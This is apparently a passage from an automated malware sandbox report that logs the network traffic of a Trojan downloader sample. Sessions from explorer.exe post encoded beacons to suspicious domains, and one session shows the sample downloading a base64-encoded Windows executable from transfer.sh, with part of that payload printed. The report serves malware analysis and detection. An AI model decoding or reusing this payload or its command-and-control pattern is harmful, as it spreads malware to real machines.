                                                                                      Data Ascii: :0 0 1.5rem 0}.upsell .button{background-color:#fde668;padding:.5rem .75rem;display:inline-block;font-size:.9rem;color:#000;text-decoration:none;text-transform:uppercase;width:fit-content;margin:0 auto;line-height:1}@media only screen and (min
                                                                                      Oct 11, 2022 05:57:07.309070110 CEST398INData Raw: 70 73 65 6c 6c 20 2e 63 6f 6c 2d 62 61 73 65 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 32 72 65 6d 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 36 2e 30 36 33 65 6d 29 7b 62 6f 64 79
                                                                                      Data Ascii: psell .col-base{min-height:12rem}}@media only screen and (min-width:66.063em){body{background-size:cover;background-repeat:no-repeat;background-attachment:fixed}.webp body{background-image:url("/images/vendor-1/park-back.webp")}.no-webp body{b
                                                                                      Oct 11, 2022 05:57:07.309092999 CEST399INData Raw: 33 35 2c 32 31 2e 32 32 2c 38 2e 33 35 7a 20 4d 32 37 2e 36 34 2c 36 2e 37 32 6c 2d 33 2e 34 38 2d 36 2e 30 33 20 63 2d 30 2e 33 38 2d 30 2e 36 37 2d 31 2e 32 33 2d 30 2e 38 39 2d 31 2e 39 2d 30 2e 35 31 6c 2d 34 2e 35 2c 32 2e 36 68 2d 34 2e 34
                                                                                      Data Ascii: 35,21.22,8.35z M27.64,6.72l-3.48-6.03 c-0.38-0.67-1.23-0.89-1.9-0.51l-4.5,2.6h-4.44c-0.52,0-1.03,0.15-1.47,0.42l-1.46,0.91c-0.41,0.25-0.65,0.7-0.65,1.18v5.49 c0,0.96,0.78,1.74,1.74,1.74c0.96,0,1.74-0.78,1.74-1.74V6.96h8c1.34,0,2.43,1.09,2.43,2
                                                                                      Oct 11, 2022 05:57:07.309123993 CEST401INData Raw: 2c 30 2e 31 31 2c 31 2e 32 20 63 30 2c 30 2e 35 34 2d 30 2e 30 36 2c 31 2e 30 36 2d 30 2e 31 38 2c 31 2e 35 36 68 31 2e 37 37 76 31 31 2e 30 32 48 35 2e 35 36 56 37 2e 32 34 68 31 2e 37 37 63 2d 30 2e 31 32 2d 30 2e 35 2d 30 2e 31 38 2d 31 2e 30
                                                                                      Data Ascii: ,0.11,1.2 c0,0.54-0.06,1.06-0.18,1.56h1.77v11.02H5.56V7.24h1.77c-0.12-0.5-0.18-1.02-0.18-1.56c0-0.41,0.04-0.81,0.11-1.2H4.86 c-1.15,0-2.08,0.93-2.08,2.07v14.47h22.24V6.55z M27.1,22.4H16.57c-0.03,0.85-0.64,1.38-1.42,1.38h-2.64 c-0.81,0-1.43-0.7
                                                                                      Oct 11, 2022 05:57:07.309153080 CEST402INData Raw: 33 20 6c 2d 31 2e 34 33 2c 31 2e 34 33 63 2d 30 2e 31 31 2c 30 2e 31 31 2d 30 2e 32 38 2c 30 2e 31 31 2d 30 2e 33 39 2c 30 4c 31 31 2e 35 2c 37 2e 35 33 63 2d 30 2e 31 31 2d 30 2e 31 31 2d 30 2e 31 31 2d 30 2e 32 38 2c 30 2d 30 2e 33 39 6c 31 2e
                                                                                      Data Ascii: 3 l-1.43,1.43c-0.11,0.11-0.28,0.11-0.39,0L11.5,7.53c-0.11-0.11-0.11-0.28,0-0.39l1.43-1.43L11.5,4.28z"/></symbol><symbol id="hosting-icon" viewBox="0 0 27.21 24.18"><path d="M24.94,0H2.27C1.02,0,0,1.02,0,2.27v15.11c0,1.25,1.02,2.27,2.27,2.27
                                                                                      Oct 11, 2022 05:57:07.309180975 CEST403INData Raw: 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 73 65 63 74 69 6f 6e 20 63 68 6f 69 63 65 20 63 65 6e 74 65 72 65 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70
                                                                                      Data Ascii: /h1></div></header><section class="page-section choice centered"><div class="page-row row_full row-col"><h2 class="sr-only">Is this domain name yours?</h2><div class="col-base col-half-width"><div class="choice-icon yes"><svg><use xlin
                                                                                      Oct 11, 2022 05:57:07.309211969 CEST405INData Raw: 69 67 68 74 3d 22 31 30 32 22 20 2f 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 72 6f 77 20 72 6f 77 5f 66 75 6c 6c 20 72 6f 77 2d 63 6f 6c 22 3e 0a 3c 68 32 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 43
                                                                                      Data Ascii: ight="102" /></div><div class="page-row row_full row-col"><h2 class="sr-only">Check out our products</h2><div class="col-base col-third-width"><h3><img src="/images/vendor-1/google_workspace.png" alt="Google Workspace logo" width="185" he
                                                                                      Oct 11, 2022 05:57:07.415437937 CEST406INData Raw: 6f 76 65 72 20 32 30 20 79 65 61 72 73 2e 3c 2f 70 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 30 31 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 62 72 61 6e 64 5f 73 65 72 76 69 63 65
                                                                                      Data Ascii: over 20 years.</p><a class="button" href="https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=augusta.broker&utm_term=corporate-services">Learn More<span class="sr-only"> about our Corporate Se


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.449705167.179.103.23780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:13.026810884 CEST411OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.luregirl.net
                                                                                      Connection: close
                                                                                      Content-Length: 412
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.luregirl.net
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.luregirl.net/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 64 47 6e 2d 4a 4e 4c 62 30 44 49 31 54 76 35 55 6f 6f 31 62 66 6d 68 2d 7e 6d 6e 68 68 51 4b 68 36 57 73 68 77 6d 70 31 28 37 66 48 47 68 4d 50 71 78 67 4a 66 2d 73 51 79 56 7e 30 4d 50 72 75 46 4a 28 39 66 43 71 63 7a 59 74 70 6f 6c 55 50 71 68 75 2d 52 36 79 33 62 74 45 33 49 47 51 47 6c 56 71 50 35 4a 75 77 4a 5f 76 50 67 63 45 76 56 49 6a 4e 63 6c 58 30 72 64 45 50 73 42 28 31 7e 53 39 44 34 74 57 55 37 50 75 41 56 72 77 65 51 70 55 34 65 42 4e 6e 5a 65 4c 52 55 69 61 6e 48 51 77 4a 74 55 65 48 67 79 55 58 31 48 37 49 74 79 42 4d 58 67 55 72 47 72 6b 6d 34 39 43 64 49 53 28 70 59 63 56 61 65 71 39 59 58 48 49 41 49 6d 5a 7a 62 6b 52 71 79 77 32 51 53 50 28 69 62 32 6d 2d 71 4c 4f 2d 52 65 6c 49 75 6b 52 55 45 54 76 6f 58 75 49 6c 73 4b 4f 52 68 46 66 73 37 76 74 39 7e 7a 6b 47 31 79 76 79 36 36 71 55 68 32 6d 65 72 52 4b 47 33 45 59 50 56 34 65 71 73 51 38 5f 7e 4c 62 76 63 6b 55 70 59 37 53 76 68 44 42 59 42 78 58 63 72 44 30 73 32 39 30 36 6c 30 30 77 28 36 53 48 41 4d 38 33 56 70 6e 4a 75 47 69 61 50 39 43 56 62 6b 63 75 68 45 4b 4e 74 67 6c 37 5a 35 7a 61 37 64 28 5a 66 41 71 31 6c 71 36 65 4c 49 30 34 6a 6f 43 65 69 59 34 61 58 37 64 66 57 75 7a 58 4b 44 6c 73 4e 75 38 76 50 77 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=dGn-JNLb0DI1Tv5Uoo1bfmh-~mnhhQKh6Wshwmp1(7fHGhMPqxgJf-sQyV~0MPruFJ(9fCqczYtpolUPqhu-R6y3btE3IGQGlVqP5JuwJ_vPgcEvVIjNclX0rdEPsB(1~S9D4tWU7PuAVrweQpU4eBNnZeLRUianHQwJtUeHgyUX1H7ItyBMXgUrGrkm49CdIS(pYcVaeq9YXHIAImZzbkRqyw2QSP(ib2m-qLO-RelIukRUETvoXuIlsKORhFfs7vt9~zkG1yvy66qUh2merRKG3EYPV4eqsQ8_~LbvckUpY7SvhDBYBxXcrD0s2906l00w(6SHAM83VpnJuGiaP9CVbkcuhEKNtgl7Z5za7d(ZfAq1lq6eLI04joCeiY4aX7dfWuzXKDlsNu8vPw).
                                                                                      Oct 11, 2022 05:57:13.301083088 CEST411INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 146
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.449706167.179.103.23780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:15.362006903 CEST412OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.luregirl.net
                                                                                      Connection: close
                                                                                      Content-Length: 188
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.luregirl.net
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.luregirl.net/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 64 47 6e 2d 4a 4e 4c 62 30 44 49 31 53 63 52 55 70 37 74 62 56 47 68 2d 78 47 6d 72 68 51 4c 49 36 57 73 6c 77 69 52 6c 71 63 37 48 47 30 67 50 71 44 59 4a 61 2d 73 54 36 31 7e 34 50 5f 72 42 46 4a 28 68 66 47 69 63 7a 63 46 70 6f 6b 6b 50 71 53 57 35 57 36 79 31 58 4e 45 77 61 32 52 4d 6c 56 47 39 35 4e 6d 77 4a 39 6e 50 67 50 63 76 56 65 7e 62 59 46 58 33 75 64 45 45 6a 68 28 35 7e 53 39 68 34 74 57 2d 37 4b 69 41 56 62 67 65 52 4b 38 5f 51 42 4e 5f 48 4f 4b 6a 45 43 62 53 4e 78 68 65 67 6d 7a 79 6d 79 46 47 33 46 7e 53 39 77 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=dGn-JNLb0DI1ScRUp7tbVGh-xGmrhQLI6WslwiRlqc7HG0gPqDYJa-sT61~4P_rBFJ(hfGiczcFpokkPqSW5W6y1XNEwa2RMlVG95NmwJ9nPgPcvVe~bYFX3udEEjh(5~S9h4tW-7KiAVbgeRK8_QBN_HOKjECbSNxhegmzymyFG3F~S9w).
                                                                                      Oct 11, 2022 05:57:15.634977102 CEST413INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 146
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.2.449707167.179.103.23780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:17.661243916 CEST413OUTGET /obc0/?-Zbh98=QEPeK6C4+xU1T+Zv89RyXnFvtkuTgj7CyQVR6lB98YiPEjAwu2VabqstxXG4WeniE5n6fSCr36EXz2ZAkGy4VKLMfvQeNDQPqw==&C0=X82hHfExC6QP HTTP/1.1
                                                                                      Host: www.luregirl.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 11, 2022 05:57:17.933495998 CEST414INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 146
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.449708167.235.29.17580C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:23.026679039 CEST415OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.bloopacts.live
                                                                                      Connection: close
                                                                                      Content-Length: 412
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.bloopacts.live
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.bloopacts.live/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 42 4f 78 4b 4e 41 70 66 67 58 74 43 4d 7a 76 30 74 30 67 41 54 48 39 4b 58 37 47 35 4f 63 4f 54 36 35 32 53 38 37 47 30 4e 69 72 52 67 70 48 5f 66 67 6a 2d 4a 4b 50 6f 55 6c 6a 61 74 34 74 50 31 45 4d 46 75 56 4d 54 61 66 57 6a 5a 46 43 79 50 6c 72 7a 55 4d 55 71 49 79 74 39 6e 42 58 55 28 6a 38 4b 44 53 6a 37 5a 39 63 4c 43 6a 63 69 44 36 33 73 47 70 7e 32 31 7a 5a 5a 63 56 46 34 48 34 48 4e 66 52 6c 63 4d 73 73 55 79 68 6f 55 36 67 65 6a 74 37 63 6a 6f 4b 6a 51 50 37 67 74 57 76 6d 4e 6f 49 49 55 7e 63 41 51 50 64 65 64 43 58 78 78 44 74 65 6b 33 51 6f 79 53 68 68 39 73 30 31 33 69 54 48 7a 6a 4a 7e 53 49 5a 62 53 44 59 54 69 67 73 57 67 7a 61 53 48 43 2d 68 47 49 30 63 34 35 79 47 5a 63 36 78 34 38 32 34 34 62 54 43 69 6f 54 56 4a 6a 59 6a 50 35 35 4e 38 52 57 57 70 46 41 4f 31 34 67 6e 50 64 48 62 63 39 57 43 58 4f 2d 34 54 41 79 72 77 47 30 72 49 69 64 28 31 45 75 4e 43 70 5f 53 51 4b 31 66 6f 6c 39 61 5a 4a 30 48 4e 75 4e 6d 64 56 54 63 68 73 62 73 4a 77 7a 6e 67 41 7a 50 62 75 74 50 61 56 38 54 4a 41 72 34 46 6a 79 4b 45 52 4a 46 74 6b 36 34 71 59 4a 69 62 50 43 63 6c 36 59 46 42 53 41 43 55 49 34 30 4b 72 4d 6b 61 77 42 4e 54 39 49 71 59 65 41 78 30 58 61 57 5f 73 54 78 58 65 77 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=BOxKNApfgXtCMzv0t0gATH9KX7G5OcOT652S87G0NirRgpH_fgj-JKPoUljat4tP1EMFuVMTafWjZFCyPlrzUMUqIyt9nBXU(j8KDSj7Z9cLCjciD63sGp~21zZZcVF4H4HNfRlcMssUyhoU6gejt7cjoKjQP7gtWvmNoIIU~cAQPdedCXxxDtek3QoyShh9s013iTHzjJ~SIZbSDYTigsWgzaSHC-hGI0c45yGZc6x48244bTCioTVJjYjP55N8RWWpFAO14gnPdHbc9WCXO-4TAyrwG0rIid(1EuNCp_SQK1fol9aZJ0HNuNmdVTchsbsJwzngAzPbutPaV8TJAr4FjyKERJFtk64qYJibPCcl6YFBSACUI40KrMkawBNT9IqYeAx0XaW_sTxXew).
                                                                                      Oct 11, 2022 05:57:23.051944971 CEST416INHTTP/1.1 200 OK
                                                                                      Date: Tue, 11 Oct 2022 03:57:23 GMT
                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                                      X-Powered-By: PHP/7.1.33
                                                                                      Content-Length: 195
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                      Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.449699144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2022-10-11 03:55:38 UTC0OUTGET /get/at0HRq/COOL2.txt HTTP/1.1
                                                                                      Host: transfer.sh
                                                                                      Connection: Keep-Alive
                                                                                      2022-10-11 03:55:39 UTC0INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Tue, 11 Oct 2022 03:55:39 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 253272
                                                                                      Connection: close
                                                                                      Cache-Control: no-store
                                                                                      Content-Disposition: attachment; filename="COOL2.txt"
                                                                                      Retry-After: Tue, 11 Oct 2022 05:55:39 GMT
                                                                                      X-Made-With: <3 by DutchCoders
                                                                                      X-Ratelimit-Key: 127.0.0.1,102.129.143.15,102.129.143.15
                                                                                      X-Ratelimit-Limit: 10
                                                                                      X-Ratelimit-Rate: 600
                                                                                      X-Ratelimit-Remaining: 9
                                                                                      X-Ratelimit-Reset: 1665460539
                                                                                      X-Remaining-Days: n/a
                                                                                      X-Remaining-Downloads: n/a
                                                                                      X-Served-By: Proudly served by DutchCoders
                                                                                      Strict-Transport-Security: max-age=63072000
                                                                                      2022-10-11 03:55:39 UTC0INData Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 43 78 48 47 7a 42 39 58 30 43 6b 76 56 39 41 70 4c 31 66 51 4b 53 30 72 76 4e 6b 76 5a 39 41 70 4c 53 75 38 2b 53 39 48 30 43 6b 74 4b 37 7a 70 4c 30 66 51 4b 53 55 6d 6c 6a 61 50 56 39 41 70 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                      Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACxHGzB9X0CkvV9ApL1fQKS0rvNkvZ9ApLSu8+S9H0CktK7zpL0fQKSUmljaPV9ApIAAAAAAAAAAAAAAAAAAAA
                                                                                      2022-10-11 03:55:39 UTC16INData Raw: 44 41 30 49 47 6e 41 43 31 57 2b 52 37 6b 41 62 6b 54 79 76 42 55 4d 51 6e 5a 67 6b 72 66 4f 50 72 35 73 4d 76 62 61 33 66 4b 46 46 6a 6b 6f 4d 78 30 44 7a 44 70 46 30 78 62 50 43 69 6a 2b 68 57 63 53 2f 6e 4f 53 47 44 65 77 49 2b 78 2f 47 34 6a 31 65 35 48 62 79 66 6e 78 33 53 4c 39 6e 71 4d 78 4c 72 30 48 39 4c 4d 5a 44 6f 36 71 46 4b 73 47 7a 41 6c 50 6f 4b 4f 69 4d 6e 5a 2b 67 33 7a 6d 48 74 76 63 37 74 58 61 54 7a 4d 72 2b 59 62 79 47 62 76 67 75 6a 4a 49 5a 55 4b 45 68 6d 72 70 4f 75 62 48 43 4e 58 4d 66 30 4f 73 55 77 37 54 49 62 49 57 65 49 72 71 34 4d 72 6d 37 75 6e 68 71 35 65 6e 4c 62 6c 77 57 70 33 63 75 6c 47 39 66 59 4e 38 6c 61 74 58 44 32 59 72 5a 4d 67 78 4c 69 5a 56 58 50 4a 4f 61 68 47 2b 53 54 79 6a 54 4f 41 2b 59 43 71 45 31 46 79 51
                                                                                      Data Ascii: DA0IGnAC1W+R7kAbkTyvBUMQnZgkrfOPr5sMvba3fKFFjkoMx0DzDpF0xbPCij+hWcS/nOSGDewI+x/G4j1e5Hbyfnx3SL9nqMxLr0H9LMZDo6qFKsGzAlPoKOiMnZ+g3zmHtvc7tXaTzMr+YbyGbvgujJIZUKEhmrpOubHCNXMf0OsUw7TIbIWeIrq4Mrm7unhq5enLblwWp3culG9fYN8latXD2YrZMgxLiZVXPJOahG+STyjTOA+YCqE1FyQ
                                                                                      2022-10-11 03:55:39 UTC32INData Raw: 66 77 36 65 54 75 6b 42 61 6b 4f 66 66 4f 39 52 67 46 4f 77 4f 6b 73 6a 58 35 33 46 6f 6b 51 71 43 72 73 31 42 51 69 6f 4e 4d 6c 6e 35 59 4f 42 56 73 6d 79 7a 79 54 41 67 79 2f 52 39 67 62 30 45 4e 63 47 53 64 67 6a 75 78 66 6c 76 78 73 65 56 54 67 42 44 56 69 4b 6f 6f 53 70 6d 71 45 5a 39 43 6f 2b 71 51 44 5a 56 4b 48 55 63 43 67 77 36 36 73 36 4d 61 49 46 38 4c 50 30 63 73 78 78 74 46 37 77 44 68 65 59 78 68 6a 45 75 38 37 2b 43 75 66 67 4a 6a 73 35 47 73 50 36 63 34 39 74 43 52 35 49 36 4f 41 33 6f 35 63 34 4b 68 5a 2b 62 69 2b 35 58 55 71 75 74 68 4b 65 57 33 4d 33 36 38 69 6d 69 59 61 43 68 45 31 5a 42 35 5a 44 64 31 45 73 6f 52 4e 52 2b 41 5a 48 39 33 61 62 6c 46 65 63 63 49 70 55 45 63 43 4a 4b 58 33 56 75 79 57 55 66 78 30 74 2f 43 75 6a 6b 74 7a
                                                                                      Data Ascii: fw6eTukBakOffO9RgFOwOksjX53FokQqCrs1BQioNMln5YOBVsmyzyTAgy/R9gb0ENcGSdgjuxflvxseVTgBDViKooSpmqEZ9Co+qQDZVKHUcCgw66s6MaIF8LP0csxxtF7wDheYxhjEu87+CufgJjs5GsP6c49tCR5I6OA3o5c4KhZ+bi+5XUquthKeW3M368imiYaChE1ZB5ZDd1EsoRNR+AZH93ablFeccIpUEcCJKX3VuyWUfx0t/Cujktz
                                                                                      2022-10-11 03:55:39 UTC48INData Raw: 30 36 35 50 45 69 46 59 4e 51 4f 71 50 75 61 55 54 54 62 2f 75 6d 37 30 2f 51 4a 67 74 66 6a 42 37 43 46 56 58 69 57 78 55 37 64 35 5a 78 62 6c 6e 5a 66 2b 58 77 36 41 58 59 78 59 2f 76 2b 35 30 67 44 39 4a 2b 6a 4c 4f 48 4a 6c 77 54 48 43 4a 39 54 6a 56 72 6a 35 53 79 4d 64 79 46 73 4d 59 6d 6d 78 62 38 53 4e 41 38 54 46 46 43 43 51 4e 33 54 67 33 6d 6b 6d 72 74 4a 4e 2f 45 2f 6b 66 52 33 32 58 4b 64 5a 78 39 63 48 39 43 62 6d 61 39 79 75 44 4e 68 36 65 4c 61 43 30 4e 34 6a 59 4c 37 49 39 58 44 2b 73 5a 53 53 66 54 54 4f 36 43 57 67 6f 5a 48 46 5a 41 68 35 61 78 53 6d 68 62 63 46 78 47 49 65 77 53 51 78 42 42 64 6d 49 2b 42 71 54 36 76 32 79 2b 38 35 65 36 2b 7a 31 6d 70 52 54 2f 68 74 37 6a 38 6f 79 70 52 2b 62 76 30 62 37 68 59 6d 79 76 4e 36 42 78 30
                                                                                      Data Ascii: 065PEiFYNQOqPuaUTTb/um70/QJgtfjB7CFVXiWxU7d5ZxblnZf+Xw6AXYxY/v+50gD9J+jLOHJlwTHCJ9TjVrj5SyMdyFsMYmmxb8SNA8TFFCCQN3Tg3mkmrtJN/E/kfR32XKdZx9cH9Cbma9yuDNh6eLaC0N4jYL7I9XD+sZSSfTTO6CWgoZHFZAh5axSmhbcFxGIewSQxBBdmI+BqT6v2y+85e6+z1mpRT/ht7j8oypR+bv0b7hYmyvN6Bx0
                                                                                      2022-10-11 03:55:39 UTC64INData Raw: 59 4a 4d 76 6a 6c 57 35 59 63 64 33 76 65 52 2f 79 30 4c 45 78 63 79 64 43 67 65 6c 31 6a 64 68 73 67 48 39 42 6c 51 42 51 52 36 53 55 2b 4d 2f 74 68 7a 79 6c 4a 6f 45 56 42 4b 67 54 2b 31 6f 66 2b 4d 50 4e 45 62 73 6b 57 59 2f 43 70 61 42 57 58 58 61 71 4a 35 45 66 6b 65 6b 6c 73 53 6b 58 35 67 77 4b 33 53 5a 33 57 4d 62 31 52 32 61 33 38 67 58 75 7a 52 6a 74 58 6d 33 73 69 33 36 4a 2f 43 72 67 46 6b 55 56 39 43 47 63 6d 59 2f 44 36 46 68 4f 7a 76 35 62 4b 62 47 59 43 77 49 66 4e 76 76 78 57 58 65 72 63 42 4a 5a 42 32 76 6b 2b 74 74 51 70 70 63 61 38 30 4e 6a 65 4f 62 78 44 54 6e 58 59 5a 45 74 54 74 5a 6b 39 2f 33 41 42 52 32 4d 4f 54 48 52 67 63 62 37 42 36 38 70 35 6a 59 6b 4e 59 59 51 48 52 48 45 78 47 6b 45 38 39 78 54 30 54 77 57 5a 35 30 46 66 73
